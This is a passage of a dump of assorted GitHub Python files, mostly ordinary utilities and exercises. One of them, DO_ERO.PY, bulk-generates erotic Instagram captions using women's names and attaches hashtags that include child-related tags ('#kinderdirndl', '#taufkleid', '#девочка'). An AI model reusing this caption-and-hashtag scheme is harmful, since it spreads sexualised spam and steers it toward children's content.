second(s)')\n\n\ndef multi_thread_get_result_using_map():\n with concurrent.futures.ThreadPoolExecutor() as executor:\n start = time.perf_counter()\n sleep_seconds = [5, 4, 3, 2, 1]\n \"\"\"\n An iterator equivalent to: python map(func, *iterables) but the calls may be evaluated out-of-order\n\n map Directly returns the results, instead of futures like we see in threads using loop.\n \"\"\"\n results = executor.map(do_something, sleep_seconds)\n\n for result in results:\n print(result)\n\n finish = time.perf_counter()\n # Actual time\n actual_time = round(finish-start, 2)\n print(f'finished in {actual_time} second(s)')\n\n\nif __name__ == \"__main__\":\n \"\"\"\n O/P:\n ---\n\n Sleeping the thread thread-1, for 1 second(s) ...\n Sleeping the thread thread-2, for 1 second(s) ...\n thread-1 Sleeping done ....\n thread-2 Sleeping done ....\n finished in 1.01 second(s)\n \"\"\"\n # multi_thread_using_context()\n\n \"\"\"\n Yields the results as they complete (finished or cancelled)\n\n O/P:\n -----\n\n Sleeping the thread Thread-5, for 5 second(s) ...\n Sleeping the thread Thread-4, for 4 second(s) ...\n Sleeping the thread Thread-3, for 3 second(s) ...\n Sleeping the thread Thread-2, for 2 second(s) ...\n Sleeping the thread Thread-1, for 1 second(s) ...\n Thread-1 Sleeping done ....\n Thread-2 Sleeping done ....\n Thread-3 Sleeping done ....\n Thread-4 Sleeping done ....\n Thread-5 Sleeping done ....\n finished in 5.01 second(s)\n \"\"\"\n # multi_thread_get_result_using_loop()\n\n \"\"\"\n Yields the results as they created.\n \n O/P:\n ---\n\n Sleeping the thread Thread-5, for 5 second(s) ...\n Sleeping the thread Thread-4, for 4 second(s) ...\n Sleeping the thread Thread-3, for 3 second(s) ...\n Sleeping the thread Thread-2, for 2 second(s) ...\n Sleeping the thread Thread-1, for 1 second(s) ...\n Thread-5 Sleeping done ....\n Thread-4 Sleeping done ....\n Thread-3 Sleeping done ....\n Thread-2 Sleeping done ....\n Thread-1 Sleeping done ....\n finished in 5.01 second(s)\n \"\"\"\n multi_thread_get_result_using_map()\n","repo_name":"Avinashgurugubelli/python_basics","sub_path":"src/multi_threading/mt_example_2.py","file_name":"mt_example_2.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27738152232","text":"from itertools import permutations\nfrom collections import deque\n\n\ndef solution(expression: str):\n answer: int = 0\n priors: list = list(permutations(['*', '+', '-']))\n\n\n mx: int = 0\n for prior in priors:\n print(prior)\n mx = max(mx, cal(expression, prior))\n print(mx, '\\n')\n\n return mx \n\n\ndef cal(expression: str, prior: tuple):\n for op in prior[:-1]:\n i: int = 0\n stack: deque = deque() \n while i < len(expression):\n if op == expression[i]:\n pre: str = \"\"\n\n while stack and stack[-1] not in prior: \n pre += stack.pop() \n if len(stack) == 1 and stack[0] in prior:\n pre += stack.pop() \n pre = pre[::-1]\n\n j: int = i + 1\n if expression[j] in prior:\n j += 1\n while j < len(expression) and expression[j] not in prior:\n j += 1\n pre += expression[i:j] \n\n for a in str(eval(pre)):\n stack.append(a)\n i = j \n\n else:\n stack.append(expression[i])\n i += 1\n \n expression = ''.join(stack)\n # print(expression)\n return abs(eval(expression))\n\n\nif __name__ == '__main__':\n print(solution(\"100-200*300-500+20\"), '\\n')\n print(solution(\"100-200*300+500-20\"), '\\n')\n print(solution(\"50*6-3*2\"), '\\n')\n print(solution(\"50*6+3*2\"), '\\n')","repo_name":"thisisiron/Algorithm","sub_path":"Programmers/kakao_intern/2020/modification.py","file_name":"modification.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6658868309","text":"from tkinter import *\nimport hashlib\n# MD5 local test strings\n# M:/Downloads/Universal-USB-Installer-1.9.7.0.exe\n# 6EF9B8E4AAF56E0D48EA8E22ECC90A9D\n\nwindow = Tk()\nwindow.title('Hash Check App')\nwindow.resizable(0,0)\n\ndef dialog():\n path1 = fp.get()\n parent = hsh.get()\n htype = hashtype.get()\n\n try:\n if htype == 'MD5':\n hasher = hashlib.md5()\n elif htype == 'SHA1':\n hasher = hashlib.sha1()\n elif htype == 'SHA256':\n hasher = hashlib.sha256()\n elif htype == 'SHA512':\n hasher = hashlib.sha512()\n# MAIN HASH FUNCTION ===============================\n BLOCKSIZE = 65536\n with open(path1, 'rb') as afile:\n buf = afile.read(BLOCKSIZE)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(BLOCKSIZE)\n filehash = hasher.hexdigest()\n# END HASH FUNCTION ===============================\n if not parent:\n box.showinfo(htype+' Hash Generated',filehash)\n hsh.set(filehash)\n else:\n if filehash == parent or filehash.upper() == parent:\n print(\"match\")\n box.showinfo('Success','The file has is a match!')\n else:\n print(\"no match\")\n print(hasher.hexdigest())\n box.showwarning('Failure','The file and the supplied hash do not match.')\n except FileNotFoundError:\n box.showerror('Error','File path was either left blank or the specified file does not exist.')\n\nfp = StringVar()\nfilepath = Entry(window, textvariable=fp, width=100)\nfplbl = Label(window, text=\"File Path:\")\nhsh = StringVar()\nhashword = Entry(window,textvariable=hsh,width=100)\nhlbl = Label(window, text=\"Hash:\")\nbtn = Button(window,text = 'Run', command = dialog, width=10)\nhashtype = StringVar()\n# img = PhotoImage(file = \"M:/Python/Capture.gif\")\n# imgLbl = Label(window, image = img)\n\n# Geometry ====================================\nfplbl.grid(row = 1, column = 1, padx = (10,5),pady=(10,5),sticky=W)\nfilepath.grid(row=1,column=2,padx=(0,10),pady=(10,5),columnspan=6)\nhlbl.grid(row = 2, column = 1, padx = (10,5),pady = (5,10),sticky=W)\nhashword.grid(row=2, column=2,padx=(0,10),pady = (5,10),columnspan=6)\nbtn.grid(row =3,column =3,rowspan=4,sticky=W,padx=(0,10))\n# imgLbl.grid(row =3, column =4,columnspan=4,rowspan=4)\n\n# GENERATE RADIO BUTTONS\nhashoptions = ['MD5','SHA1','SHA256','SHA512']\ni = 0\nfor txt in hashoptions:\n i += 1\n b = Radiobutton(window, text=txt, padx=10, variable=hashtype, value=txt)\n b.grid(row =i+2, column = 2,sticky=W)\n if i == 1:\n b.select()\n if i == 4:\n b.grid(pady = (0,5))\n\nwindow.mainloop()\n","repo_name":"nivagator/hash-check-app","sub_path":"hashcheck_v02.py","file_name":"hashcheck_v02.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23345156205","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n__title__ = ''\n__author__ = 'javen'\n__mtime__ = '17-3-30'\n# code is far away from bugs with the god animal protecting\n I love animals. They taste delicious.\n ┏┓ ┏┓\n ┏┛┻━━━┛┻┓\n ┃ ☃ ┃\n ┃ ┳┛ ┗┳ ┃\n ┃ ┻ ┃\n ┗━┓ ┏━┛\n ┃ ┗━━━┓\n ┃ 神兽保佑 ┣┓\n ┃ 永无BUG! ┏┛\n ┗┓┓┏━┳┓┏┛\n ┃┫┫ ┃┫┫\n ┗┻┛ ┗┻┛\n\"\"\"\nimport pytz\n\nimport datetime\nfrom Models.Mapper.Abstract import Model_Mapper_Abstract\nclass Model_Mapper_AmazonProduct(Model_Mapper_Abstract):\n def __init__(self):\n super(Model_Mapper_AmazonProduct, self).__init__()\n\n def save(self, region, asin, data):\n searchData = {'region': region,\n 'asin' : asin,\n }\n result = self.findData(\"all\", \"amazon_product\", searchData)\n if (result):\n # print (result)\n result = self.update(\"amazon_product\", data, searchData)\n else:\n tz = pytz.timezone('Asia/Shanghai')\n last_updated_time = datetime.datetime.now(tz).strftime(\"%Y-%m-%d %H:%M:%S\")\n data['last_updated_time'] = last_updated_time\n result = self.insert(\"amazon_product\", data, searchData)\n return result\n\n def saveFromKeywordsProduct(self, region, data):\n searchData = {\n 'region': region,\n 'asin': data['asin']\n }\n result = self.findData(\"all\", \"amazon_product\", searchData)\n if (result):\n result = self.update(\"amazon_product\", data, searchData)\n else:\n result = self.insert(\"amazon_product\", data, searchData)\n return result\n","repo_name":"GinVenXi/All_Scraper","sub_path":"all_scraper/Models/Mapper/AmazonProduct.py","file_name":"AmazonProduct.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8773332121","text":"import datetime\nimport os\nimport re\nimport PyPDF2\nimport vaxutils\n\n\ndef main():\n\n date = datetime.date.today() - datetime.timedelta(days=1)\n url_date = date.strftime(\"%-d.%-m.%y\")\n url = f\"http://www.covidmaroc.ma/Documents/BULLETIN/{url_date}.COVID-19.pdf\"\n \n os.system(f\"curl {url} -o morocco.pdf -s\")\n\n with open(\"morocco.pdf\", \"rb\") as pdfFileObj:\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n text = pdfReader.getPage(0).extractText()\n\n regex = r\"Bénéficiaires de la vaccination\\s+Cumul global([\\d\\s]+)Situation épidémiologique\"\n\n total_vaccinations = re.search(regex, text)\n total_vaccinations = vaxutils.clean_count(total_vaccinations.group(1))\n\n date = str(date)\n\n vaxutils.increment(\n location=\"Morocco\",\n total_vaccinations=total_vaccinations,\n date=date,\n source_url=url,\n vaccine=\"Oxford/AstraZeneca, Sinopharm/Beijing\"\n )\n\n os.remove(\"morocco.pdf\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"arafatahmedtanimcsedu57/covid-data","sub_path":"scripts/scripts/vaccinations/automations/incremental/morocco.py","file_name":"morocco.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11984872008","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport functools as ft\nfrom math import *\n\n\ndef arrayFfile(nome):\n with open(nome) as file:\n data = file.read()\n vetor = data.split()\n for i in range(len(vetor)):\n vetor[i] = int(vetor[i])\n return vetor\n\ndef plotHist(vetor):\n plt.hist(vetor, rwidth=0.5)\n\n\ndef media(vetor):\n return sum(vetor)/len(vetor)\n\ndef mediaPond(matriz):\n pesoTotal = sum(matriz[1])\n valorTotal = 0\n for i in range(len(matriz[1])):\n valorTotal += matriz[0][i]*matriz[1][i]\n return valorTotal/pesoTotal\n\ndef mediaGeometrica(vetor):\n acumulador = 1\n for i in range(len(vetor)):\n acumulador*=vetor[i]\n return acumulador**(1/len(vetor))\n \ndef amplitude(vetor):\n min = min(vetor)\n max = max(vetor)\n return max-min\n\ndef mediaTaxas(vetorA, vetorB):\n media(vetorA/vetorB)\n\ndef mediana(vetor):\n vetor_ordenado = sorted(vetor)\n tamanho = len(vetor_ordenado)\n\n if tamanho % 2 == 0:\n mediana = (vetor_ordenado[tamanho // 2-1] + vetor_ordenado[tamanho //2])/2\n else:\n mediana = vetor_ordenado[tamanho // 2]\n return mediana\n \n#----------------------To do---------------------------------\n\n\n#def mediaHarmonica\n#def mediaTaxas\n#--exercicio slide 18Exercício\n#def mediana\n#def moda\n#--exercicio slide 29\n#--exercicio slide 30\n#--exercicio slide 31\n#def desvioPadrao\n#--exercicio slide 33\n#def coefVariacao\n##--exercicio slide 35\n#def quartis\n##--exercicio slide 42\n#def intevaloConfiancaMedia\n#--exercicio slide 51\n#--exercicio slide 54\n#def testeMediazero\n#--exercicio slide 58\n#--exercicio slide 59\n#--exercicio slide 62\n#def tamanhoAmostra\n#--exercicio slide 67\n#--exercicio slide 69\n#def testeHipotese\n#def testeShapWilk\n#--exercicio slide 86\n#\n#\n#\n\n","repo_name":"EugenioAL/Avd","sub_path":"avdLib.py","file_name":"avdLib.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"29956619369","text":"import xlsxwriter\nimport csv\nimport datetime\nimport pandas as pd\nimport os\nimport time\nimport random\nfrom PIL import Image\n\n#generowanie zdania\npoczatek = [\"Sexy\", \"Treffen\", \"Treffen Sie das Schöne\", \"Schön\", \"Hot\", \"Erotisch\", \"Hübsch\", \"Attraktiv\",\"Frech\",\"Süß\",\"Einmalig\"]\n\nimiona = ['Mia', 'Emma', 'Hannah', 'Emilia', 'Lina', 'Sophia', 'Anna', 'Marie', 'Milena', 'Lena', 'Lara', 'Lea', 'Maja', 'Clara', 'Amelie', 'Johanna', 'Mila', 'Ida', 'Laura', 'Leni', 'Frieda', 'Luisa', 'Mathilda', 'Paula', 'Nele', 'Helena', 'Charlotte', 'Nora', 'Greta', 'Marlene', 'Jule', 'Melina', 'Jana', 'Sofie', 'Jasmin', 'Lotta', 'Fiona', 'Lisa', 'Paulina', 'Leonie', 'Carlotta', 'Annika', 'Victoria', 'Isabella', 'Franziska', 'Karoline', 'Annelie', 'Celina', 'Ronja', 'Lynn', 'Katharina', 'Alina', 'Nina', 'Teresa', 'Kira', 'Chiara', 'Stella', 'Ella', 'Lia', 'Julie', 'Rosa', 'Leila', 'Elisa', 'Lucie', 'Linda', 'Jette', 'Mira', 'Gloria', 'Juliana', 'Ina', 'Jara', 'Magdalena', 'Amalia', 'Svea', 'Emily', 'Elina', 'Hedi', 'Henriette', 'Josephine', 'Anni', 'Elena', 'Liv', 'Felicitas', 'Emmi', 'Elisabeth', 'Tilda', 'Tara', 'Eva', 'Kaja', 'Juna', 'Annemarie', 'Maira', 'Merle', 'Nike', 'Milla', 'Ines', 'Josefine', 'Marlene', 'Angelina', 'Romy', 'Jolina', 'Klara']\n\n\nnaileoceniasz = \",Wie hoch schätzen Sie ein?\"\n\nemotki = [\"😍\",\"🤭\",\"👍\",\"😮\",\"😘\",\"🥰\",\"🤪\",\"😜\"]\n\nhashtags = ['#deutschland', '#girl', '#germany', '#münchen', '#kinderdirndl', '#германия', '#me', '#russian', '#taufkleid', '#德国', '#travel', '#лето', '#photography', '#summervibes', '#nomakeup', '#lithuanian', '#hamburg', '#taufdirndl', '#fest', '#女孩', '#annakaval', '#девочка', '#ukrainian', '#summer', '#alemania', '#nofilters', '#afrika', '#liebe', '#alpen']\n\n\n#rename pliki i convert na jpg\npath = \"S:\\\\insta\\\\niemiecki\"\n\n# get list of files in folder\nfiles = os.listdir(path)\n\n# keep only files with extension .webp or .png\nfiles = [f for f in files if f.endswith('.webp') or f.endswith('.png')]\n\n# loop through files and convert to jpg\nfor i, file in enumerate(files):\n # open file\n im = Image.open(os.path.join(path, file))\n \n # convert to jpg and save with new name\n new_name = f'{i+1}.jpg'\n im = im.convert('RGB')\n im.save(os.path.join(path, new_name))\n \n # delete original file\n os.remove(os.path.join(path, file))\n\n# rename remaining files to numbering from 1\nfiles = os.listdir(path)\nfor i, file in enumerate(files):\n # ignore files that are already jpg\n if not file.endswith('.jpg'):\n # construct new name\n new_name = f'{i+1}.jpg'\n \n # rename file\n os.rename(os.path.join(path, file), os.path.join(path, new_name))\n\n\n\n\n# Set up the input and output file paths\nxlsx_file_path = \"C:\\\\PROGRAMOWANIE\\\\PYTHON\\\\GotoweVistaBulk\\\\InstaEroDE.xlsx\"\n\ndate_str = input(\"Podaj date opublikowania pierwszego posta 'DD.MM.YYYY HH:MM': \")\n\ndate = datetime.datetime.strptime(date_str, \"%d.%m.%Y %H:%M\")\n\n# Create a new XLSX file and add a worksheet\nworkbook = xlsxwriter.Workbook(xlsx_file_path)\nworksheet = workbook.add_worksheet()\n\n \n \n\n# Set the column headers\nheader_row = [\"message\", \"type\", \"link\", \"time\",\"commment1\"]\nworksheet.write_row(0, 0, header_row)\n\n# Set up the CSV reader and read the column data\n\n\n# Write the column data and other data to the worksheet\nfor i in range(14):\n # Write the message column data\n \n sentence = f\"{random.choice(poczatek)} {random.choice(imiona)} {naileoceniasz} {random.choice(emotki)} \\n{random.choices(hashtags, k=15)}\"\n \n worksheet.write(i + 1, 0, sentence)\n \n # Write the type column data\n worksheet.write(i + 1, 1, \"image\")\n \n # Write the link column data\n link = f\"http://hosting2275851.online.pro/zdjecia/ero/instaDE/{i+1}.jpg\"\n worksheet.write(i + 1, 2, link)\n \n # Write the time column data\n \n \n worksheet.write(i + 1, 3, date.strftime(\"%d.%m.%Y %H:%M\"))\n date += datetime.timedelta(hours = 24)\n \n \n \n\n\n\n# Close the workbook\nworkbook.close()\n\n\n\n\n\n\n\n\n# read the xlsx file\ndf = pd.read_excel(\"C:\\\\PROGRAMOWANIE\\\\PYTHON\\\\GotoweVistaBulk\\\\InstaEroDE.xlsx\")\n\n# save as csv file\ndf.to_csv(\"C:\\\\PROGRAMOWANIE\\\\PYTHON\\\\GotoweVistaBulk\\\\InstaEroDE.csv\", index=False)\n\n# end the program\nexit()","repo_name":"Rajo03/Portfolio","sub_path":"PYTHON/AUTOMATYZACJA/generatorvistabulk/DO_ERO.PY","file_name":"DO_ERO.PY","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74091117684","text":"#!/usr/bin/env python3\n\n# NOTE: These are octal color codes are compatible with bash!\n# https://stackoverflow.com/a/28938235\nPREFIX = \"\\033\" # octal color code prefix\nRESET = \"\\033[0m\" # RESET all color codes with this\n\n# NOTE: Foreground\nBLACK = \"\\033[0;30m\" # BLACK\nRED = \"\\033[0;31m\" # RED\nGREEN = \"\\033[0;32m\" # GREEN\nYELLOW = \"\\033[0;33m\" # YELLOW\nBLUE = \"\\033[0;34m\" # BLUE\nMAGENTA = \"\\033[0;35m\" # PURPLE\nCYAN = \"\\033[0;36m\" # CYAN\nWHITE = \"\\033[0;37m\" # WHITE\n\n# NOTE: BOLD\nBLACK_BOLD = \"\\033[1;30m\" # BLACK\nRED_BOLD = \"\\033[1;31m\" # RED\nGREEN_BOLD = \"\\033[1;32m\" # GREEN\nYELLOW_BOLD = \"\\033[1;33m\" # YELLOW\nBLUE_BOLD = \"\\033[1;34m\" # BLUE\nMAGENTA_BOLD = \"\\033[1;35m\" # PURPLE\nCYAN_BOLD = \"\\033[1;3m\" # CYAN\nWHITE_BOLD = \"\\033[1;37m\" # WHITE\n\n# NOTE: UNDERLINE\nBLACK_U = \"\\033[4;30m\" # BLACK\nRED_U = \"\\033[4;31m\" # RED\nGREEN_U = \"\\033[4;32m\" # GREEN\nYELLOW_U = \"\\033[4;33m\" # YELLOW\nBLUE_U = \"\\033[4;34m\" # BLUE\nMAGENTA_U = \"\\033[4;35m\" # PURPLE\nCYAN_U = \"\\033[4;36m\" # CYAN\nWHITE_U = \"\\033[4;37m\" # WHITE\n\n# NOTE: BACKGROUND\nBLACK_BG = \"\\033[40m\" # BLACK\nRED_BG = \"\\033[41m\" # RED\nGREEN_BG = \"\\033[42m\" # GREEN\nYELLOW_BG = \"\\033[43m\" # YELLOW\nBLUE_BG = \"\\033[44m\" # BLUE\nMAGENTA_BG = \"\\033[45m\" # PURPLE\nCYAN_BG = \"\\033[46m\" # CYAN\nWHITE_BG = \"\\033[47m\" # WHITE\n\nFOREGROUND_COLORS = {\n \"\": RESET,\n \"BLACK\": BLACK,\n \"RED\": RED,\n \"GREEN\": GREEN,\n \"YELLOW\": YELLOW,\n \"BLUE\": BLUE,\n \"MAGENTA\": MAGENTA,\n \"CYAN\": CYAN,\n \"WHITE\": WHITE,\n}\nBACKGROUND_COLORS = {\n \"\": RESET,\n \"BLACK\": BLACK_BG,\n \"RED\": RED_BG,\n \"GREEN\": GREEN_BG,\n \"YELLOW\": YELLOW_BG,\n \"BLUE\": BLUE_BG,\n \"MAGENTA\": MAGENTA_BG,\n \"CYAN\": CYAN_BG,\n \"WHITE\": WHITE_BG,\n}\n\nCOLORS = {\n **FOREGROUND_COLORS,\n \"BLACK-BG\": BLACK_BG,\n \"RED-BG\": RED_BG,\n \"GREEN-BG\": GREEN_BG,\n \"YELLOW-BG\": YELLOW_BG,\n \"BLUE-BG\": BLUE_BG,\n \"MAGENTA-BG\": MAGENTA_BG,\n \"CYAN-BG\": CYAN_BG,\n \"WHITE-BG\": WHITE_BG,\n}\n\n\n# TODO: change naming scheme\n# HIGH INTENSITY\nIBLACK = \"\\033[0;90m\" # BLACK\nIRED = \"\\033[0;91m\" # RED\nIGREEN = \"\\033[0;92m\" # GREEN\nIYELLOW = \"\\033[0;93m\" # YELLOW\nIBLUE = \"\\033[0;94m\" # BLUE\nIMAGENTA = \"\\033[0;95m\" # PURPLE\nICYAN = \"\\033[0;96m\" # CYAN\nIWHITE = \"\\033[0;97m\" # WHITE\n\n# BOLD HIGH INTENSITY\nBIBLACK = \"\\033[1;90m\" # BLACK\nBIRED = \"\\033[1;91m\" # RED\nBIGREEN = \"\\033[1;92m\" # GREEN\nBIYELLOW = \"\\033[1;93m\" # YELLOW\nBIBLUE = \"\\033[1;94m\" # BLUE\nBIMAGENTA = \"\\033[1;95m\" # PURPLE\nBICYAN = \"\\033[1;96m\" # CYAN\nBIWHITE = \"\\033[1;97m\" # WHITE\n\n# HIGH INTENSITY BACKGROUNDS\nON_IBLACK = \"\\033[0;100m\" # BLACK\nON_IRED = \"\\033[0;101m\" # RED\nON_IGREEN = \"\\033[0;102m\" # GREEN\nON_IYELLOW = \"\\033[0;103m\" # YELLOW\nON_IBLUE = \"\\033[0;104m\" # BLUE\nON_IMAGENTA = \"\\033[0;105m\" # PURPLE\nON_ICYAN = \"\\033[0;106m\" # CYAN\nOn_IWHITE = \"\\033[0;107m\" # White\n","repo_name":"Saccharine-Coal/colored_logger","sub_path":"colored_logger/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28133708656","text":"from django.urls import reverse\nfrom gbe.functions import validate_perms\nfrom gbe.models import Class\nfrom gbe.views import ReviewBidListView\n\n\nclass ReviewClassListView(ReviewBidListView):\n reviewer_permissions = ('Class Reviewers', )\n object_type = Class\n bid_review_view_name = 'class_review'\n bid_review_list_view_name = 'class_review_list'\n template = 'gbe/class_review_list.tmpl'\n\n def set_row_basics(self, bid, review_query):\n bid_row = super(ReviewClassListView, self).set_row_basics(bid,\n review_query)\n if self.can_schedule:\n url = reverse(\"class_changestate\",\n urlconf='gbe.urls',\n args=[bid.id])\n if bid.accepted == 3:\n bid_row['extra_button'] = {'url': url,\n 'text': \"Add to Schedule\"}\n elif bid.ready_for_review:\n bid_row['extra_button'] = {'url': url,\n 'text': \"Accept & Schedule\"}\n return bid_row\n\n def groundwork(self, request):\n super(ReviewClassListView, self).groundwork(request)\n self.can_schedule = validate_perms(request,\n ('Scheduling Mavens',),\n False)\n","repo_name":"bethlakshmi/gbe-divio-djangocms-python2.7","sub_path":"gbe/views/review_class_list_view.py","file_name":"review_class_list_view.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"29707207949","text":"cases=eval(input())\noutput=[]\nfor i in range(cases):\n n=eval(input())\n word=input()\n seen=set()\n left=0\n ans=[]\n while left Tuple[str, str]:\n line = markdown.split(\"\\n\")[0]\n if \":\" in line:\n index = line.index(\":\")\n type = line[:index].strip()\n markdown = markdown[index + 1 :].strip()\n return type, markdown\n else:\n return \"\", markdown\n\n\ndef strip_ptags(html: str) -> str:\n html = html.replace(\"

\", \"\").replace(\"

\", \"
\")\n if html.endswith(\"
\"):\n html = html[:-4]\n return html\n\n\ndef convert(text: str) -> str:\n blocks = []\n for block in split(text):\n if block.startswith(\">>>\"):\n block = f\"~~~python\\n{block}\\n~~~\\n\"\n blocks.append(block)\n return \"\\n\".join(blocks).strip()\n\n\ndef delete_indent(lines, start, stop):\n from mkapi.core.docstring import get_indent\n\n indent = get_indent(lines[start])\n return \"\\n\".join(x[indent:] for x in lines[start:stop]).strip()\n\n\ndef split(text: str) -> Iterator[str]:\n start = 0\n in_code = False\n lines = text.split(\"\\n\")\n for stop, line in enumerate(lines, 1):\n if \">>>\" in line and not in_code:\n if start < stop - 1:\n yield \"\\n\".join(lines[start : stop - 1])\n start = stop - 1\n in_code = True\n elif not line.strip() and in_code:\n yield delete_indent(lines, start, stop)\n start = stop\n in_code = False\n if start < len(lines):\n yield delete_indent(lines, start, len(lines))\n\n\ndef admonition(name: str, markdown: str) -> str:\n if name.startswith(\"Note\"):\n type = \"note\"\n elif name.startswith(\"Warning\"):\n type = \"warning\"\n else:\n type = name.lower()\n lines = [\" \" + line if line else \"\" for line in markdown.split(\"\\n\")]\n lines.insert(0, f'!!! {type} \"{name}\"')\n return \"\\n\".join(lines)\n","repo_name":"daizutabi/mkapi","sub_path":"mkapi/core/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"76"} +{"seq_id":"31149830743","text":"#--------------------------------------------------------------------\n# TITLE: Internet Video Downloader \n# AUTHOR: Andre Rosa\n# DATE: 18 FEB 2018\n# TESTED WITH: Youtube, Twitch, Daily Motion, Facebook, Veoh and Liveleak\n# OBJECTIVE: This module is the FIRST part of the Categorizer Program. \n#--------------------------------------------------------------------\n\n# PROBLEM:\n# Some files are downloaded as mkv, flv and other formats. The program failed when converting some of these files to mp4.\n# I tried to convert from mkv to h.264 and got an error of a missing codec, check available codecs with 'ffmpeg -codecs'\n# look some explanation on: https://stackoverflow.com/questions/30898671/converting-mkv-to-h-264-ffmpeg\n# and then on: https://askubuntu.com/questions/483187/winff-ffmpeg-unknown-encoder-libvo-aacenc\n# The problem is that some codecs that allow conversion are missing on this computer. \n# I will not install the missing codecs because the final user will not use this computer for production.\n# SOLUTION:\n# if the program can not convert the video to mp4 it will ignore the video and add a line in the Error_Report 'missing codec to convert to mp4'\n\n# DEPENDENCIES\nfrom __future__ import unicode_literals\n\nimport youtube_dl # version 2019.2.8 https://anaconda.org/conda-forge/youtube-dl\n # for a list of supported sites for youtube_dl: https://rg3.github.io/youtube-dl/supportedsites.html\nimport urllib # version 1.7.1 https://anaconda.org/conda-forge/python_http_client\n\n# mylibs\n# import sys\n# sys.path.insert(0, '../../0. Commons')\nfrom sysColor import sysColor\n\n#=========================================================================================\n# VIDEODOWNLOADER\n#=========================================================================================\nclass VideoDownloader:\n\n #=========================================================\n # VIDEO INFO: Nested class holds the information about a video\n #=========================================================\n class VideoInfo:\n def __init__(self, info, url, uniqueName):\n ''' VideoInfo Constructor '''\n self.vid_url = url\n self.vid_id = info.get(\"id\", None)\n self.vid_uname = uniqueName # generates a unique name for the video\n self.vid_title = info.get('title', None) # the original video title taken from the home page\n self.vid_vcodec = info.get('vcodec', None) #video codec\n self.vid_acodec = info.get('acodec', None) #audio codec\n\n # Return a message about the codecs for the video\n def getCodedInfo (self):\n ''' Return a text message about the video to be saved on file. '''\n msg = str(str(self.vid_uname) + ',' + str(self.vid_vcodec) + ',' + str(self.vid_acodec) + ',' + str(self.vid_url) )\n return msg\n \n def getVideoName (self):\n ''' Return the string Video Title '''\n return self.vid_uname\n #=========================================================\n\n #=========================================================\n # NESTED CLASS USED TO AVOID TOO VERBOSE YOUTUBE_DL MESSAGES\n #=========================================================\n class MyLogger:\n def debug(self, msg):\n pass\n def warning(self, msg):\n pass\n def error(self, msg):\n pass\n #print(msg)\n #=========================================================\n\n #------------------------------------------------------------\n def __my_hook(self, d):\n if d['status'] == 'finished':\n print('Done downloading, now converting ...')\n #------------------------------------------------------------\n #------------------------------------------------------------\n def setVideoFolder(self, folder):\n self.videoFolder = folder\n #------------------------------------------------------------\n\n #------------------------------------------------------------\n # GENERATE A UNIVERSLLY UNIQUE IDENTIFIER FOR THE VIDEO NAME\n #------------------------------------------------------------\n def __generateUniqueName (self):\n ''' Return a universally unique identifier created with uuid.'''\n import uuid # https://docs.python.org/2/library/uuid.html\n return uuid.uuid4().hex # to create unique file names\n #------------------------------------------------------------\n\n #-------------------------------------------------------------\n # CONFIGURATION OF THE YOUTUBE DOWNLOADER\n #-------------------------------------------------------------\n def __getDLConfiguration(self, uniqueName):\n ''' Return the parameters used to download files with YouTube_DL '''\n\n # PARAMETERS FOR THE DOWNLOADER\n # https://github.com/rg3/youtube-dl/blob/master/README.md\n # https://github.com/rg3/youtube-dl/blob/master/README.md#embedding-youtube-dl\n ydl_opts = {\n 'write-auto-sub': False,\n 'skip-download': True,\n 'recode-video': 'mp4',\n 'outtmpl': self.videoFolder + '/' + uniqueName + '.%(ext)s', #'./videos/%(title)s.%(ext)s'\n 'logger': self.logger,\n 'progress_hooks': [self.__my_hook],\n } # https://stackoverflow.com/questions/35643757/how-to-set-directory-in-ydl-opts-in-using-youtube-dl-in-python\n\n return ydl_opts\n #---------------------------------------------------------------\n\n #---------------------------------------------------------------\n # VIDEODOWNLOADER CONSTRUCTOR\n #---------------------------------------------------------------\n def __init__(self, videoList = None):\n '''VideoDownloader Constructor receives the txt file (videoList) with the list of url to download.\\n\n If no list is passed the downloader can be used to download single videos with download method '''\n\n if (videoList != None):\n self.files = self.__load_list (videoList)\n self.fileName = videoList\n else:\n self.files = []\n self.fileName = ''\n\n self.errorList = [] # a list of videos and error causes\n self.vidInfoList = [] # holds the data of all videos (ok or not) with url and codecs\n self.logger = self.MyLogger()\n self.vidOK = [] # list of videos that was downloaded successfully \n self.videoFolder = './videos' #folder to save videos # default value of video destination folder\n\n # create movie directory if does not exist\n import os\n if not os.path.exists(self.videoFolder):\n os.makedirs(self.videoFolder)\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # SET THE URL FILE WITH VIDEO URL TO DOWNLOAD\n #--------------------------------------------------------------------\n def setURLList (self, videoList):\n ''' Public method to set and load file with the videos url.''' \n self.files = self.__load_list (videoList)\n self.fileName = videoList\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # LOAD THE FILE WITH URL TO 